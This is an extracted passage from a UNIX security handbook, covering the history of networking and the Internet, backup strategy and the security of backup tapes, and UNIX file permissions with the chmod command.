● Wide Area Networks (WANS) are slower-speed networks that organizations typically use to<br />


connect their LANS. WANS are often built from leased telephone lines capable of moving data at<br />

speeds of 56 kilobits/sec to 1.55 megabits/sec. A WAN might bridge a company's offices on either<br />

side of the town or on either side of a continent. Some WANS are shared by several organizations.<br />

Figure 16.1: Ethernet local area network<br />

Figure 16.2: 10Base-T local area network<br />

Some authors also use the terms Enterprise Networks and Metropolitan Networks (MANS). In general,<br />

these are simply combinations of LANS and WANS which serve a logically related group of systems.<br />

Many businesses started using LANS in the late 1980s and expanded into the world of WANS in the<br />


early 1990s. Nevertheless, the technology to network computers was actually developed in the reverse<br />

order: WANS were first developed in the early 1970s to network timesharing computers that were used<br />

by many people at the same time. Later, in the early 1980s, LANS were developed, after computers<br />

became economical and single-user computers became a financial reality.<br />

16.1.1 The <strong>Internet</strong>[1]<br />

[1] We recommend that readers interested in the history of networks read the excellent<br />

Casting the Net: From ARPANET to INTERNET and Beyond, by Peter H. Salus<br />

(Addison-Wesley, 1995).<br />

One of the first computer networks was the ARPANET, developed in the early 1970s by universities and<br />

corporations working under contract to the Department of Defense's Advanced Research Projects Agency<br />

(ARPA, once also known as DARPA). The ARPANET linked computers around the world, and served<br />

as a backbone for many other regional and campus-wide networks that sprang up in the 1980s. In the late<br />

1980s, the ARPANET was superseded by the NSFNET, funded in part by the National Science<br />

Foundation. Funding for the NSFNET was cut in the early 1990s as commercial networks grew in<br />

number and scope.<br />

Today, the descendent of the ARPANET is known as the <strong>Internet</strong>. The <strong>Internet</strong> is an IP-based[2] network<br />

that encompasses hundreds of thousands of computers and tens of millions of users throughout the world.<br />

Similar to the phone system, the <strong>Internet</strong> is well connected. Any one of those tens of millions of users<br />

can send you electronic mail, exchange files with your FTP file server, or try his hand at breaking into<br />

your system - if your system is configured to allow them the access necessary to do so.<br />

[2] IP stands for <strong>Internet</strong> Protocol, the basic protocol family for packet interchange.<br />

16.1.1.1 Who is on the <strong>Internet</strong>?<br />

In the early days of the ARPANET, the network was primarily used by a small group of research<br />

scientists, students, and administrative personnel. <strong>Sec</strong>urity problems were rare: if somebody on the<br />

network was disruptive, tracking him down and having him disciplined was a simple matter. In extreme<br />

cases, people could lose their network privileges, or even their jobs (which produced the same result). In<br />

many ways, the <strong>Internet</strong> was a large, private club.<br />

These days the <strong>Internet</strong> is not so exclusive. The <strong>Internet</strong> has grown so large that you can almost never<br />

determine the identity of somebody who is breaking into your system: attackers may appear to be coming<br />

from a university in upstate New York, but the real story can be quite different. Attackers based in the<br />

Netherlands could have broken into a system in Australia, connected through the Australian system to a<br />

system in South Africa, and finally connected through the South African system to a New York<br />

university. The attackers could then use the New York account as a base of operations to launch attacks<br />

against other sites, with little chance of being traced back to their own site. This site hopping is known as<br />

network weaving or connection laundering.<br />

Even if you are persistent and discover the true identity of your attacker, you may have no course of<br />

action: the attacks may be coming from a country that does not recognize breaking into computers as a<br />

crime. Or, the attacks may be coming from an agent of a foreign government, as part of a plan to develop<br />

so-called "information warfare" capabilities.[3] There is also a suspected component of activity by<br />


organized crime, and by some multinational corporations. In each of these cases, there may be<br />

considerable resources arrayed against any attempt to identify and prosecute the perpetrators.<br />

[3] Some authorities speculate (in private) that as many as a third of break-ins to major<br />

corporate and government computers in the U.S. may be the result of "probe" attempts by<br />

foreign agents, at least indirectly.<br />

16.1.2 Networking and <strong>UNIX</strong><br />

<strong>UNIX</strong> has both benefited from and contributed to the popularity of networking. Berkeley's 4.2 release in<br />

1983 provided a straightforward and reasonably reliable implementation of the <strong>Internet</strong> Protocol (IP), the<br />

data communications standard that the <strong>Internet</strong> uses. Since then, the Berkeley networking code has been<br />

adopted by most <strong>UNIX</strong> vendors, as well as by vendors of many non-<strong>UNIX</strong> systems.<br />

After more than a decade of development, the <strong>UNIX</strong> operating system has evolved to such a point that<br />

nearly all of the things that you can do on a single time-shared computer can be done at least as well<br />

on a network of <strong>UNIX</strong> workstations. Here is a sample list:<br />

● Remote virtual terminals (telnet and rlogin). Lets you log into another computer on the network.<br />

● Remote file service. Lets you access your files on one computer while you are using another.<br />

● Electronic mail (mail and sendmail). Lets you send a message to a user or users on another<br />
computer.<br />

● Electronic directory service (finger, whois, and ph). Lets you find out the username, telephone<br />
number, and other information about somebody on another computer.<br />

● Date and time. Lets your computer automatically synchronize its clock with other computers on<br />
the network.<br />

● Remote Procedure Call (RPC). Lets you invoke subroutines and programs on remote systems as if<br />
they were on your local machine.<br />



Chapter 7<br />

7. Backups<br />

Contents:<br />

Make Backups!<br />

Sample Backup Strategies<br />

Backing Up System Files<br />

Software for Backups<br />


Those who forget the past are condemned to fulfill it.<br />

George Santayana, Life of Reason<br />

Those who do not archive the past are condemned to retype it!<br />

Garfinkel and Spafford, <strong>Practical</strong> <strong>UNIX</strong> <strong>Sec</strong>urity (first edition)<br />

When we were working on the first edition of <strong>Practical</strong> <strong>UNIX</strong> <strong>Sec</strong>urity, we tried in vain to locate a<br />

source of the quotation "those who forget the past are condemned to repeat it." But no matter where we<br />

searched, we couldn't find the source. What we found instead was the reference above in George<br />

Santayana's book, Life of Reason. So we printed it and added our own variation.<br />

What's the point? Few people take the time to verify their facts, be they the words of Santayana's<br />

oft-misquoted statement, or the contents of an unlabeled backup tape. In the years since <strong>Practical</strong> <strong>UNIX</strong><br />

<strong>Sec</strong>urity was first published, we have heard of countless instances in which people or whole<br />

organizations have had their files lost to computer failure or vandalism. Often, the victims are unable to<br />

restore their systems from full and complete backups. Instead, restoration is often a piecemeal and lengthy<br />

project - a few files from this tape, a few files from that one, and a few from the original CD-ROM<br />

distribution.<br />

Even if backup tapes exist, there are still problems. In one case, a researcher at Digital Equipment<br />

Corporation lost a decade's worth of personal email because of a bad block at the beginning of a 2GB<br />

DAT tape. The contents of the tape had never been verified.<br />

In another case, we know of a project group that had to manually recreate a system from printouts (that<br />

is, they had to retype the entire system) because the locally written backup program was faulty. Although<br />

the staff had tested the program, they had only tested the program with small, random files - and the<br />

program's bug was that it only backed up the first 1024 bytes of each real file. Unfortunately, this fault<br />

was not discovered until after the program had been in use several months.<br />


Making backups and verifying them may be the most important things that you can do to protect your<br />

data - other than reading this book, of course!<br />

7.1 Make Backups!<br />

Bugs, accidents, natural disasters, and attacks on your system cannot be predicted. Often, despite your<br />

best efforts, they can't be prevented. But if you have backups, you can compare your current system and<br />

your backed-up system, and you can restore your system to a stable state. Even if you lose your entire<br />

computer - to fire, for instance - with a good set of backups you can restore the information after you<br />

have purchased or borrowed a replacement machine. Insurance can cover the cost of a new CPU and disk<br />

drive, but your data is something that in many cases can never be replaced.<br />

Take the Test<br />

Before we go on with this chapter, take some time for the following quick test:<br />

When was the last time your computer was backed up?<br />

A) Yesterday or today<br />

B) Within the last week<br />

C) Within the last month<br />

D) My computer has never been backed up<br />

E) My computer is against a wall and cannot be backed up any further<br />

If you answered C or D, stop reading this book right now and back up your data. If you answered E, you<br />

should move it out from the wall to allow for proper cooling ventilation, and then retake the test.<br />

Russell Brand writes:[1] "To me, the user data is of paramount importance. Anything else is generally<br />

replaceable. You can buy more disk drives, more computers, more electrical power. If you lose the data,<br />

through a security incident or otherwise, it is gone."<br />

[1] Coping with the Threat of Computer <strong>Sec</strong>urity Incidents, 1990, published on the <strong>Internet</strong>.<br />

Mr. Brand made this comment in a paper on <strong>UNIX</strong> security several years ago; we think it summarizes<br />

the situation well, within limits.[2] Backups are one of the most critical aspects of your system operation.<br />

Having backups that are valid, complete, and up to date may make the difference between a minor<br />

incident and a catastrophe.<br />

[2] We actually think personnel are more important than data. We've seen disaster response<br />

plans that call for staff members to dash into burning rooms to close tape closets or rescue<br />

tapes; these are stupid. Plans that require such activity are not likely to work when needed,<br />

and are morally indefensible.<br />


7.1.1 Why Make Backups?<br />

Backups are important only if you value the work that you do on your computer. If you use your<br />

computer as a paperweight, then you don't need to make backups.<br />

You also don't need to back up a computer that only uses read-only storage, such as a CD-ROM. A<br />

variant of this is Sun's "dataless" client workstations, in which the operating system is installed from a<br />

CD-ROM and never modified. When configured this way, the computer's local hard disk is used as an<br />

accelerator and a cache, but it is not used to store data you would want to archive. Sun specifically<br />

designs its operating system for these machines so that they do not need backups.<br />

On the other hand, if you ever turn your computer on and occasionally modify data on it, then you must<br />

make a copy of that information if you want to recover it in the event of a loss.<br />

7.1.1.1 A taxonomy of computer failures<br />

Years ago, making daily backups was a common practice because computer hardware would often fail<br />

for no obvious reason. A backup was the only protection against data loss.<br />

Today, hardware failure is still a good reason to back up your system. In 1990, many hard-disk<br />

companies gave their drives two- or three-year guarantees; many of those drives are failing now. Even<br />

though today's state-of-the-art hard disk drives might come with five-year warranties, they too will fail<br />

one day!<br />

Such a failure might not be years away, either. In the fall of 1993, one of the authors bought a new<br />

1.7GB hard drive to replace a 1.0 GB unit. The files were copied from the older drive to the newer one,<br />

and then the older unit was reformatted and given to a colleague. The next week, the 1.7GB unit failed.<br />

Luckily, there was a backup.<br />

Backups are important for a number of other reasons as well:<br />

User error<br />

Users - especially novice users - accidentally delete their files. A user might type rm * -i instead of<br />

typing rm -i *. Making periodic backups protects users from their own mistakes, because the<br />

deleted files can be restored. Mistakes aren't limited to novices, either. More than one expert has<br />

accidentally overwritten a file by issuing an incorrect editor or compiler command, or accidentally<br />

trashed an entire directory by mistyping a wildcard to the shell.<br />

System-staff error<br />

Sometimes your system staff may make a mistake. For example, a system administrator deleting<br />

old accounts might accidentally delete an active one.<br />

Hardware failure<br />

Hardware breaks, often destroying data in the process: disk crashes are not unheard of. If you have<br />

a backup, you can restore the data on a different computer system.<br />

Software failure<br />

Application programs occasionally have hidden flaws that destroy data under mysterious<br />


circumstances.[3] If you have a backup and your application program suddenly deletes half of your<br />

500 x 500-cell spreadsheet, you can telephone the vendor and provide them with the dataset that<br />

caused the program to misbehave. You can also reload your data to try a different approach (and a<br />

different spreadsheet!).<br />

[3] Unfortunately, more than "occasionally." Quality control is not job #1 for most<br />

vendors - even the big ones. It's probably not even job # 10. This fact is why most<br />

software is sold with the tiny print disclaimers of liability and waiver of warranty.<br />

When your vendors don't have that much confidence in their own software, you<br />

shouldn't either. Caveat emptor.<br />

Electronic break-ins and vandalism<br />

Computer crackers sometimes alter or delete data. Unfortunately, they seldom leave messages<br />
telling you whether they changed any information - and even if they do, you can't trust them! If<br />
you suffer a break-in, you can compare the data on your computer after the break-in with the data<br />
on your backup to determine if anything was changed. Items that have changed can be replaced<br />
with originals.<br />

Theft<br />

Computers are expensive and easy to sell. For this reason, small computers - especially laptops -<br />

are often stolen. Cash from your insurance company can buy you a new computer, but it can't<br />

bring back your data. Not only should you make a backup, you should take it out of your computer<br />

and store it in a safe place, so that if the computer is stolen, at least you'll have your data.<br />

Natural disaster<br />

Sometimes rain falls and buildings are washed away. Sometimes the earth shakes and buildings are<br />

demolished. Fires are also very effective at destroying the places where we keep our computers.<br />

Mother Nature is inventive and not always kind. As with theft, your insurance company can buy<br />

you a new computer, but it can't bring back your data.<br />

Other disasters<br />

Sometimes Mother Nature isn't to blame: planes crash into buildings; gas pipes leak and cause<br />

explosions; and sometimes building-maintenance people use disk-drive cabinets as temporary saw<br />

horses (really!). We even know of one instance in which EPA inspectors came into a building and<br />

found asbestos in the A/C ducts, so they forced everyone to leave within 10 minutes, and then<br />

sealed the building for several months!<br />

Archival information<br />

Backups provide archival information that lets you compare current versions of software and<br />

databases with older ones. This capability lets you determine what you've changed - intentionally<br />

or by accident. It also provides an invaluable resource if you ever need to go back and reconstruct<br />

the history of a project, either as an academic exercise, or to provide evidence in a court case.<br />


7.1.2 What Should You Back Up?<br />

There are two schools of thought concerning computer-backup systems:<br />

1. Back up everything that is unique to your system, including all user files, any system databases<br />
that you might have modified (such as /etc/passwd and /etc/tty), and system directories (such as<br />
/bin and /usr/bin) that are especially important or that you may have modified.<br />

2. Back up everything, because restoring a complete system is easier than restoring an incomplete<br />
one, and tape is cheap.<br />

We recommend the second school of thought. While some of the information you back up is already<br />

"backed up" on the original distribution disks or tape you used to load them onto your hard disk,<br />

distribution disks or tapes sometimes get lost. Furthermore, as your system ages, programs get installed<br />

in reserved directories such as /bin and /usr/bin, security holes get discovered and patched, and other<br />

changes occur. If you've ever tried to restore your system after a disaster,[4] you know how much easier<br />

the process is when everything is in the same place.<br />

[4] Imagine having to reapply 75 vendor "jumbo patches" by hand, plus all the little security<br />

patches you got off the net and derived from this book, plus all the tweaks to optimize<br />

performance - for each system you manage. Ouch!<br />

For this reason, we recommend that you store everything from your system (and that means everything<br />

necessary to reinstall the system from scratch - every last file) onto backup media at regular, predefined<br />

intervals. How often you do this depends on the speed of your backup equipment and the amount of<br />

storage space allocated for backups. You might want to do a total backup once a week, or you might<br />

want to do it only twice a year.<br />

But please do it!<br />

7.1.3 Types of Backups<br />

There are three basic types of backups:<br />

● A day-zero backup<br />
Makes a copy of your original system. When your system is first installed, before people have<br />
started to use it, back up every file and program on the system. Such backups can be invaluable<br />
after a break-in.[5]<br />

[5] We recommend that you also do such a backup immediately after you restore your<br />
system after recovering from a break-in. Even if you have left a hole open and the<br />
intruder returns, you'll save a lot of time if you are able to fix the hole in the backup,<br />
rather than starting from scratch again.<br />

● A full backup<br />
Makes a copy of every file on your computer to the backup device. This method is similar to a<br />
day-zero backup, except that you do it on a regular basis.<br />


● An incremental backup<br />

Makes a copy to the backup device of only those items in a filesystem that have been modified<br />

after a particular event (such as application of a vendor patch) or date (such as the date of the last<br />

full backup).<br />

Full backups and incremental backups work together. One common backup strategy is:<br />

● Make a full backup on the first day of every other week.<br />

● Make an incremental backup every evening of everything that has been modified since the last full<br />
backup.<br />

Most <strong>UNIX</strong> administrators plan and store their backups by partition. Different partitions usually require<br />

different backup strategies. Some partitions, like the root filesystem and the /etc filesystem (if it is<br />

separate), should probably be backed up whenever you make a change to them, on the theory that every<br />

change that you make to them is too important to lose. You should use full backups with these systems,<br />

rather than incremental backups, because they are only usable in their entirety.<br />

On the other hand, partitions that are used for keeping user files are more amenable to incremental<br />

backups. Partitions that are used solely for storing application programs really only need to be backed up<br />

when new programs are installed or when the configuration of existing programs is changed.<br />
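As a sketch of how such a schedule might look with the traditional dump program (the device and filesystem names here are only examples - substitute your own):<br />

# Biweekly full (level 0) backup of the /home partition; the u flag
# records the date in /etc/dumpdates.
dump 0uf /dev/rmt0 /home

# Nightly incremental: level 5 saves everything changed since the most
# recent dump at a lower level (here, the last level 0).
dump 5uf /dev/rmt0 /home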

When you make incremental backups, use a rotating set of backup tapes.[6] The backup you do tonight<br />

shouldn't write over the tape you used for your backup last night. Otherwise, if your computer crashes in<br />

the middle of tonight's backup, you would lose the data on the disk, the data in tonight's backup (because<br />

it is incomplete), and the data in last night's backup (because you partially overwrote it with tonight's<br />

backup). Ideally, perform an incremental backup once a night, and have a different tape for every night<br />

of the week, as shown in Figure 7.1.<br />

[6] Yes, all tapes rotate. We mean that the tapes are rotated with each other according to a<br />

schedule, rather than being rotated around a spindle.<br />

Figure 7.1: An incremental backup<br />


Update Your Backup Configuration!<br />

When you add new disks or change the partitions of your existing disks, be sure to update your backup<br />

scripts so that the new disks are backed up! If you are using the <strong>UNIX</strong> dump/restore facility, be sure to<br />

update the /etc/dumpdates file so that the dump program will not think that full backups have already<br />

been made of the new partitions.<br />

7.1.4 Guarding Against Media Failure<br />

You can use two distinct sets of backup tapes to create a tandem backup. With this backup strategy, you<br />

create two complete backups (call them A and B) on successive backup occasions. Then, when you<br />

perform your first incremental backup, the A incremental, you back up all of the files that were created or<br />

modified after the original A backup (even if they are on the B full backup tape). The second time you<br />

perform an incremental backup, your B incremental, you write out all of the files that were created or<br />

modified since the B backup (even if they are on the A incremental backup). This system protects you<br />

against media failure, because every file is backed up in two locations. It does, however, double the<br />

amount of time that you will spend performing backups.<br />

Some kinds of tapes - in particular, 4mm or 8mm video tape and Digital Audio Tape (DAT) - cannot be<br />

reused repeatedly without degrading the quality of the backup. If you use the same tape cartridge for<br />

more than a fixed number of backups (usually, 50 or 100), you should get a new one. Be certain to see<br />

what the vendor recommends - and don't push that limit. The few pennies you may save by using a tape<br />

beyond its useful range will not offset the cost of a major loss.<br />

Try to restore a few files chosen at random from your backups each time, to make sure that your<br />

equipment and software are functioning properly. Stories abound about computer centers that have lost<br />

disk drives and gone to their backup tapes, only to find them all unreadable. This scenario can occur as a<br />

result of bad tapes, improper backup procedures, faulty software, operator error (see the sidebar below),<br />


or other problems.<br />

A Classic Case of Backup Horror<br />

Sometimes, the weakest link in the backup chain is the human responsible for making the backup. Even<br />

when everything is automated and requires little thought, things can go badly awry. The following was<br />

presented to one of us as a true story. The names and agency have been omitted for obvious reasons.<br />

It seems that a government agency had hired a new night operator to do the backups of the <strong>UNIX</strong><br />

systems. The operator indicated that she had prior computer operations experience. Even if she hadn't,<br />

that was okay - little was needed in this job because the backup was largely the result of an automated<br />

script. All the operator had to do was log in at the terminal in the machine room located next to the tape<br />

cabinet, start up a command script, and follow the directions. The large disk array would then be backed<br />

up with the correct options.<br />

All went fine for several months, until one morning, the system administrator met the operator leaving.<br />

She was asked how the job was going. "Fine," she replied. Then the system administrator asked if she<br />

needed some extra tapes to go with the tapes she was using every night - he noticed that the disks were<br />

getting nearer to full capacity as they approached the end of the fiscal year. He was met by a blank stare<br />

and the chilling reply "What tapes?"<br />

Further investigation revealed that the operator didn't know she was responsible for selecting tapes from<br />

the cabinet and mounting them. When she started the command file (using <strong>UNIX</strong> dump), it would pause<br />

while mapping the sectors on disk that it needed to write to tape. She would wait a few minutes, see no<br />

message, and assume that the backup was proceeding. She would then retire to the lounge to read.<br />

Meanwhile, the tape program would, after some time, begin prompting the operator to mount a tape and<br />

press the return key. No tape was forthcoming, however, and the mandatory security software installed<br />

on the system logged out the terminal and cleared the screen after 60 minutes of no typing. The operator<br />

would come back some hours later and see no error messages of any kind.<br />

Murphy was kind: the system did not crash in the next few hours that it took the panicked system<br />

administrator to make a complete level zero dump of the system. Procedures were changed, and the<br />

operator was given more complete training.<br />

How do you know if the people doing your backups are doing them correctly?<br />

At least once a year, you should attempt to restore your entire system completely from backups to ensure<br />

that your entire backup system is working properly. Starting with a different, unconfigured computer, see<br />

if you can restore all of your tapes and get the new computer operational. Sometimes you will discover<br />

that some critical file is missing from your backup tapes. These practice trials are the best times to<br />

discover a problem and fix it.<br />

It's possible that your computer vendor may let you borrow or rent a computer of the appropriate<br />

configuration to let you perform this test. The whole process should take only a few hours, but it will do<br />

wonders for your peace of mind and will verify that your backup procedure is working correctly (or<br />

illustrate any problems, if it isn't). If you have business continuation insurance, you might even get a<br />

break on your premiums by doing this on a regular basis!<br />


A related exercise that can prove valuable is to pick a file at random, once a week or once a month, and<br />

try to restore it. Not only will this reveal if the backups are comprehensive, but the exercise of doing the<br />

restoration may also provide some insight.<br />
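With dump-format tapes, such a spot check might look like the following sketch. The device name and the sample file are assumptions (the example presumes the tape holds a dump of the root filesystem), and restore's options differ slightly among vendors:<br />

# Verify that the tape can be read at all by listing its table of contents.
restore tf /dev/rmt0

# Extract one file into a scratch directory and compare it with the live copy.
mkdir /tmp/verify && cd /tmp/verify
restore xf /dev/rmt0 ./etc/passwd
cmp ./etc/passwd /etc/passwd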

NOTE: We have heard many stories about how the tape drive used to make the backup<br />

tapes had a speed or alignment problem. Such a problem results in the tapes being readable<br />

by the drive that made them, but unreadable on every other tape drive in the world! Be sure<br />

that you load your tapes on other drives when you check them.<br />

7.1.5 How Long Should You Keep a Backup?<br />

It may take a week or a month to realize that a file has been deleted. Therefore, you should keep some<br />

backup tapes for a week, some for a month, and some for several months.<br />

Many organizations make yearly backups that they archive indefinitely. After all, tape or CD-ROM is<br />

cheap, and rm is forever. Keeping a yearly or a biannual backup "forever" is a small investment in the<br />

event that it should ever be needed again.<br />

You may wish to keep on your system an index or listing of the names of files on your backup tapes.<br />

This way, if you ever need to restore a file, you can find the right tape to use by scanning the index,<br />

rather than reading in every single tape. Having a printed copy of these indexes is also a good idea,<br />

especially if you keep the online index on a system that may need to be restored!<br />
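One simple way to build such an index - sketched here for dump-format tapes, with example device, label, and file names - is to capture each tape's table of contents as the tape is verified and keep a printed copy with it:<br />

# Record and print an index for the tape labeled "weekly-12".
restore tf /dev/rmt0 | tee /var/backups/weekly-12.index | lpr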

NOTE: If you keep your backups for a long period of time, you should be sure to migrate<br />

the data on your backups each time you purchase a new backup system. Otherwise, you<br />

might find yourself stuck with a lot of tapes that can't be read by anyone, anywhere. This<br />

happened in the late 1980s to the MIT Artificial Intelligence Laboratory, which had a<br />

collection of research reports and projects from the 1970s on seven-track tape. One day, the<br />

lab started a project to put all of the old work online once more. The only problem was that<br />

there didn't appear to be a working seven-track tape drive anywhere in the country that the<br />

lab could use to restore the data.<br />

7.1.6 <strong>Sec</strong>urity for Backups<br />

Backups pose a double problem for computer security. On the one hand, your backup tape is your safety<br />

net: ideally, it should be kept far away from your computer system so that a local disaster cannot ruin<br />

both. But on the other hand, the backup contains a complete copy of every file on your system, so the<br />

backup itself must be carefully protected.<br />

7.1.6.1 Physical security for backups<br />

If you use tape drives to make backups, be sure to take the tape out of the drive! One company in San<br />

Francisco that made backups every day never bothered removing the cartridge tape from their drive:<br />

when their computer was stolen over a long weekend by professional thieves who went through a false<br />

ceiling in their office building, they lost everything. "The lesson is that the removable storage media is<br />

much safer when you remove it from the drive," said an employee after the incident.<br />

Do not store your backup tapes in the same room as your computer system! Any disaster that might<br />


damage or destroy your computers is likely to damage or destroy anything in the immediate vicinity of<br />

those computers as well. This rule applies to fire, flood, explosion, and building collapse.<br />

You may wish to consider investment in a fireproof safe to protect your backup tapes. However, the safe<br />

should be placed off site, rather than right next to your computer system. While fireproof safes do protect<br />

against fire and theft, they don't protect your data against explosion, many kinds of water damage, and<br />

building collapse.<br />

NOTE: Be certain that any safe you use for storing backups is actually designed for storing<br />

your form of media. One of the fireproof lockboxes from the neighborhood discount store<br />

might not be magnetically safe for your tapes. It might be heat-resistant enough for storing<br />

paper, but not for storing magnetic tape, which cannot withstand the same high<br />

temperatures. Also, some of the generic fire-resistant boxes for paper are designed with a<br />

liquid in the walls that evaporates or foams when exposed to heat, to help protect paper<br />

inside. Unfortunately, these chemicals can damage the plastic in magnetic tape or<br />

CD-ROMs.<br />

7.1.6.2 Write-protect your backups<br />

After you have removed a backup tape from a drive, do yourself a favor and flip the write-protect switch.<br />

A write-protected tape cannot be accidentally erased.<br />

If you are using the tape for incremental backups, you can flip the write-protect switch when you remove<br />

the tape, and then flip it again when you reinsert the tape later. If you forget to unprotect the tape, your<br />

software will probably give you an error and let you try again. On the other hand, having the tape<br />

write-protected will save your data if you accidentally put the wrong tape in the tape drive, or run a<br />

program on the wrong tape.<br />

7.1.6.3 Data security for backups<br />

File protections and passwords protect the information stored on your computer's hard disk, but anybody<br />

who has your backup tapes can restore your files (and read the information contained in them) on another<br />

computer. For this reason, keep your backup tapes under lock and key.<br />

Several years ago, an employee at a computer magazine pocketed a 4mm cartridge backup tape that was<br />

on the desk of the system manager. When the employee got the tape home, he discovered that it<br />

contained hundreds of megabytes of personal files, articles in progress, customer and advertising lists,<br />

contracts, and detailed business plans for a new venture that the magazine's parent company was<br />

planning. The tape also included tens of thousands of dollars worth of computer application programs,<br />

many of which were branded with the magazine's name and license numbers. Quite a find for an insider<br />

who is setting up a competing publication.<br />

When you transfer your backup tapes from your computer to the backup location, protect the tapes at<br />

least as well as you normally protect the computers themselves. Letting a messenger carry the tapes from<br />

building to building may not be appropriate if the material on the tapes is sensitive. Getting information<br />

from a tape by bribing an underpaid courier, or by knocking him unconscious and stealing it, is usually<br />

easier and cheaper than breaching a firewall, cracking some passwords, and avoiding detection online.<br />


Another Tale of Backup Woe<br />

One apocryphal story we saw on the net several years ago concerned a system administrator who tried to<br />

do the right thing. Every week, he'd make a full backup of his system. He would test the backups to be<br />

certain the tapes were readable. Then he would throw them into the passenger seat of his car and he'd<br />

drive home, where he would store the tapes in a fireproof safe.<br />

All proceeded without incident for many months until there was a major disaster of some sort that<br />

destroyed the computer room. Our would-be hero felt quite relieved that he had these valuable backups<br />

in a safe place. So, after an alternate site was identified, he drove home and retrieved some of the tapes.<br />

Unfortunately, the tapes contained no usable data. All the data was lost.<br />

The problem? It seems that these events occurred in the far north, during the winter. The administrator's<br />

car had heater wires in the car seats, and the current passing through the wires degaussed the data on the<br />

tapes that he stored on the passenger seat during the long ride home.<br />

Is it true? Possibly. But even if not, the lessons are sound ones: test your backup tapes after subjecting<br />

them to whatever treatment you would expect for a tape you would need to use, and exercise great care in<br />

how you store and transport the tapes.<br />

The use of encryption can dramatically improve the security for backup tapes. However, if you do choose<br />

to encrypt your backup tapes, be sure that the encryption key is known by more than one person. You<br />

may wish to escrow your key (see the sidebar entitled "A Note About Key Escrow" in Chapter 6,<br />

Cryptography). Otherwise, the backups may be worthless if the only person with the key forgets it,<br />

becomes incapacitated, or decides to hold your data for ransom.<br />

Here are some ideas for storing a backup tape's encryption key:<br />

● Always use the same key. Physical security of your backup tape should be your first line of defense.

● Store copies of the key on pieces of paper in envelopes. Give the envelopes to each member of the organization's board of directors, or chief officers.

● If your organization uses an encryption system such as PGP that allows a message to be encrypted for multiple recipients, encrypt and distribute the backup encryption key so that it can be decrypted by anyone on the board (see the example after this list).

● Alternatively, you might consider a secret-sharing system, so that the key can be decrypted by any two or three board members working together, but not by any board member on his own.
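With a command-line version of PGP, for instance, the backup key file can be encrypted to several officers' public keys in a single step. The filename and user IDs below are illustrative, and the syntax shown assumes PGP 2.6:

% pgp -e backup-tape.key officer1 officer2 officer3

Any one of the named officers can then recover the backup key with his or her own private key, and no copy of the key needs to be stored in the clear.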

7.1.7 Legal Issues<br />

Finally, some firms should be careful about backing up too much information, or holding it for too long.<br />

Recently, backup tapes have become targets in lawsuits and criminal investigations. Backup tapes can be<br />

obtained by subpoena or during discovery in lawsuits. If your organization has a policy regarding the<br />

destruction of old paper files, you should extend this policy to backup tapes as well.<br />

You may wish to segregate potentially sensitive data so that it is stored on separate backup tapes. For<br />


example, you can store applications on one tape, pending cases on another tape, and library files and<br />

archives on a third.<br />

Back up your data, but back up with caution.<br />




Chapter 5<br />

The <strong>UNIX</strong> Filesystem<br />

5.2 Using File Permissions<br />

Because file permissions determine who can read and modify the information stored in your files, they are your primary method<br />

for protecting the data that you store on your <strong>UNIX</strong> system.<br />

Consider the directory listing presented earlier in this chapter:<br />

% ls -lF<br />

total 161<br />

-rw-r--r-- 1 sian user 505 Feb 9 13:19 instructions<br />

-rw-r--r-- 1 sian user 3159 Feb 9 13:14 invoice<br />

-rw-r--r-- 1 sian user 6318 Feb 9 13:14 letter<br />

-rw------- 1 sian user 15897 Feb 9 13:20 more-stuff<br />

-rw-r----- 1 sian biochem 4320 Feb 9 13:20 notes<br />

-rwxr-xr-x 1 sian user 122880 Feb 9 13:26 stats*<br />

-------r-x 1 sian user 989987 Mar 6 08:13 weird-file<br />

%<br />

In this example, any user on the system can read the files instructions, invoice, letter, or stats because they all have the letter r in<br />

the "other" column of the permissions field. The file notes can be read only by user sian or by users who are in the biochem<br />

group. And only sian can read the information in the file more-stuff.<br />

A more interesting set of permissions is present on weird-file. User sian owns the file but cannot access it. Members of group<br />

user also are not allowed access. However, any user except sian who is also not in the group user can read and execute the file.<br />

Variants of these permissions are useful in cases where you want to make a file readable or executable by others, but

you don't want to accidentally overwrite or execute it yourself. If you are the owner of the file and the permissions deny you<br />

access, it does not matter if you are in the group, or if other bits are set to allow the access.<br />

Of course, the superuser can read any file on the system, and anybody who knows Sian's password can log in as sian and read<br />

her files (including weird-file, if the permissions are changed first).<br />

5.2.1 chmod: Changing a File's Permissions<br />

You can change a file's permissions with the chmod command or the chmod() system call. You can change a file's permissions<br />

only if you are the file's owner. The one exception to this rule is the superuser: if you are logged in as superuser, you can change<br />

the permissions of any file.[12]<br />

[12] Any file that is not mounted using NFS, that is. See Chapter 20 for details.<br />

In its simplest form, the chmod command lets you specify which of a file's permissions you wish to change. This usage is called<br />

symbolic mode. The symbolic form of the chmod command[13] has the form:<br />

[13] The <strong>UNIX</strong> kernel actually supports two system calls for changing a file's mode: chmod(), which changes the<br />

mode of a file, and fchmod(), which changes the mode of a file associated with an open file descriptor.<br />

chmod [-Rfh] [agou][+-=][rwxXstugol] filelist<br />

This command changes the permissions of filelist, which can be either a single file or a group of files. The letters agou specify<br />

whose privileges are being modified. You may provide none, one, or more, as shown in Table 5.5.<br />


Table 5.5: Whose Privileges Are Being Modified?

Letter   Meaning
a        Modifies privileges for all users
g        Modifies group privileges
o        Modifies others' privileges
u        Modifies the owner's privileges

The symbols specify what is supposed to be done with the privilege. You must type only one symbol, as shown in Table 5.6.<br />

Table 5.6: What to Do with Privilege<br />

Symbol Meaning<br />

+ Adds to the current privilege<br />

- Removes from the current privilege<br />

= Replaces the current privilege<br />

The last letters specify which privilege is to be added, as shown in Table 5.7.<br />

Table 5.7: What Privileges Are Being Changed?<br />

Letter Meaning<br />

Options for all versions of <strong>UNIX</strong><br />

r Read access<br />

w Write access<br />

x Execute access<br />

s SUID or SGID<br />

t Sticky bit[14]<br />

Options for BSD-derived versions of <strong>UNIX</strong> only:<br />

X Sets execute only if the file is a directory or already has some other execute bit set.<br />

u Takes permissions from the user permissions.<br />

g Takes permissions from the group permissions.<br />

o Takes permissions from other permissions.<br />

Options for System V-derived versions of <strong>UNIX</strong> only:<br />

l Enables mandatory locking on file.<br />

[14] On most systems, only the superuser can set the sticky bit on a non-directory filesystem entry.<br />
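For example, on versions of chmod that support the X letter, a command like the following adds execute (search) permission to the directories in a tree, and to any files that already have an execute bit set, without making ordinary data files executable; the directory name here is only an illustration:

% chmod -R a+X ~/public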

If the -R option is specified for versions that support it, the chmod command runs recursively. If you specify a directory in<br />

filelist, that directory has its permission changed, as do all of the files contained in that directory. If the directory contains any<br />

